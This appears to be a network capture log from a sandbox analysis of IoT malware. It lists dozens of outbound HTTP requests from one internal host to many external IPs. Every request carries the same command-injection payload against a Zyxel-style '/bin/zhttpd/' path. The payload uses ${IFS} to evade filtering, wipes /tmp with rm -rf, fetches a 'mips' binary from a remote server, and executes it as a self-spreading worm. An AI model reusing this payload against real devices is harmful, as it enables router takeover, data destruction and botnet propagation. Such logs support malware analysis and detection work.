                                        Mar 31, 2024 09:21:03.658500910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3466192.168.2.2356942143.11.238.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658576012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3467192.168.2.2347004185.81.5.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658646107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3468192.168.2.2340850161.74.239.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.658682108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3469192.168.2.2360568119.255.54.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.659198046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3470192.168.2.2359846126.76.2.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.627079010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3471192.168.2.2350438218.186.37.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.672843933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3472192.168.2.23557689.81.161.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.672873020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3473192.168.2.235077618.103.249.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.672909021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3474192.168.2.233430490.87.76.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.672976971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3475192.168.2.234865276.87.52.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673033953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3476192.168.2.2340702140.94.97.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673091888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3477192.168.2.2352666175.20.21.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673150063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3478192.168.2.234742262.79.38.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673185110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3479192.168.2.23479521.117.124.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673255920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3480192.168.2.2349654184.2.124.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673300982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3481192.168.2.23482125.135.37.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673345089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3482192.168.2.2360794177.119.33.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673398972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3483192.168.2.2350160174.63.121.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673479080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3484192.168.2.2335628190.156.155.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673521996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3485192.168.2.235347225.218.205.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673585892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3486192.168.2.234199060.47.165.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673639059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3487192.168.2.235039260.126.33.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673688889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3488192.168.2.2335030125.42.96.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673741102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3489192.168.2.2351394164.159.92.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673804045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3490192.168.2.235512894.254.63.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673865080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3491192.168.2.23431645.70.25.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673913956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3492192.168.2.2339082217.11.111.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.673969984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3493192.168.2.235339024.104.119.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674050093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3494192.168.2.2335836209.96.30.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674114943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3495192.168.2.2354430194.170.110.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674155951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3496192.168.2.234028652.78.131.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674204111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3497192.168.2.2351944210.213.110.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674253941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3498192.168.2.234935896.33.239.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674312115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3499192.168.2.2346712122.136.142.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674359083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3500192.168.2.235166265.129.115.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674436092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3501192.168.2.234854097.7.18.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674501896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3502192.168.2.233557099.206.151.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674551010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3503192.168.2.235235043.24.79.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674611092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3504192.168.2.233900652.248.21.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674668074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3505192.168.2.2351640150.213.169.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674757957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3506192.168.2.2345200199.169.2.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674813986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3507192.168.2.234353818.46.44.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674866915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3508192.168.2.2335870150.26.53.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.674941063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3509192.168.2.2347964118.81.47.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675014973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3510192.168.2.2354914202.185.141.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675069094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3511192.168.2.2351298183.54.78.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675120115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3512192.168.2.234701875.32.40.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675192118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3513192.168.2.235106827.53.225.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675239086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3514192.168.2.235460688.65.35.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675297976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3515192.168.2.2351364187.107.117.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675357103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3516192.168.2.2345756123.77.47.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675410032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3517192.168.2.2355568119.169.134.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675488949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3518192.168.2.233909020.144.255.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675534010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3519192.168.2.2340614199.140.89.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675596952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3520192.168.2.235045695.57.32.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675653934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3521192.168.2.235808298.106.176.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675704002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3522192.168.2.234155639.69.15.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675760984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3523192.168.2.2349584128.146.53.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675842047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3524192.168.2.2334730160.100.33.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675874949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3525192.168.2.2356218180.241.165.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.675964117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3526192.168.2.234338417.96.203.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676021099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3527192.168.2.2351180184.197.218.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676074982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3528192.168.2.2356210102.234.151.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676146984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3529192.168.2.2360936200.186.215.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676211119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3530192.168.2.2343648174.248.163.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676261902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3531192.168.2.234540053.203.20.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676318884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3532192.168.2.233786048.152.36.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.676356077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3533192.168.2.233860036.140.13.33443
                                        TimestampBytes transferredDirectionData
